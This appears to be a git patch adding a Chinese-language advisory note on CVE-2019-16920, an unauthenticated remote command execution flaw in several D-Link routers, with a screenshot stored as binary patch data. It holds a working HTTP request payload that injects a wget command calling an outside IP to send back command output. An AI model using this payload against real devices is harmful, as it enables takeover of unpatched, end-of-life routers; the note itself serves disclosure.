From 62f4831de6f0c8a667df25eac0bdb9b6943ec233 Mon Sep 17 00:00:00 2001
From: mr-xn <mrxn.net@gmail.com>
Date: Thu, 10 Oct 2019 22:09:22 +0800
Subject: [PATCH] add CVE-2019-16920-D-Link-rce

---
 CVE-2019-16920-D-Link-rce.md |  46 +++++++++++++++++++++++++++++++++++
 img/46.jpeg                  | Bin 0 -> 15811 bytes
 2 files changed, 46 insertions(+)
 create mode 100644 CVE-2019-16920-D-Link-rce.md
 create mode 100644 img/46.jpeg
diff --git a/CVE-2019-16920-D-Link-rce.md b/CVE-2019-16920-D-Link-rce.md
new file mode 100644
index 0000000..dae5aeb
--- /dev/null
+++ b/CVE-2019-16920-D-Link-rce.md
@@ -0,0 +1,46 @@
+## D-Link路由器曝出RCE漏洞，牵涉多个型号  
+
+### 简介
+
+> Fortinet旗下FortiGuard实验室的研究人员披露了D-Link路由器上的一个远程命令执行漏洞，牵涉多个型号  
+
+### 相关文章
+
+> https://www.fortinet.com/blog/threat-research/d-link-routers-found-vulnerable-rce.html  
+> https://nosec.org/home/detail/3020.html  
+
+### 根据作者披露的受影响型号为：
+
+- DIR-655
+- DIR-866L
+- DIR-652
+- DHP-1565
+
+## POC 如下
+
+> 攻击者可以利用该漏洞将任意字符串发送到“PingTest”网关接口来实现命令注入。
+
+```
+POST /apply_sec.cgi HTTP/1.1
+Host: 192.168.232.128
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 131
+Connection: close
+Referer: http://192.168.232.128/login_pic.asp
+Cookie: uid=1234123
+Upgrade-Insecure-Requests: 1
+html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://45.76.148.31:4321/?$(echo 1234)
+```
+
+> “该漏洞始于一次错误的身份验证过程。当我们要进入管理页面时，需要执行登录操作。此时，我们会对`apply_sec.cgi`页面发出`POST`请求，其中包含一个操作`ping_test`。研究后发现，我们可通过参数`ping_ipaddr`执行命令注入。虽然响应是返回登录页面，但操作`ping_test`仍然执行了，我们通过参数`ping_ipaddr`注入的命令`echo 1234`成功执行，并将结果发送回我们的服务器。” 
+>
+> ![](img/46.jpeg)
+>
+> **专家们发现，由于糟糕的身份权限检查，即使无用户权限，也可以远程执行命令。**
+
+> 研究人员在9月22日向D-Link报告了漏洞，而厂商在两天后承认漏洞存在，并在三天后确认不会发布相关补丁，因为这些产品都已经到了生命周期的终点。
+
diff --git a/img/46.jpeg b/img/46.jpeg
new file mode 100644
index 0000000000000000000000000000000000000000..5dd25322cf865fa2a3c12e8874055672c10ed9bf
GIT binary patch
literal 15811
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
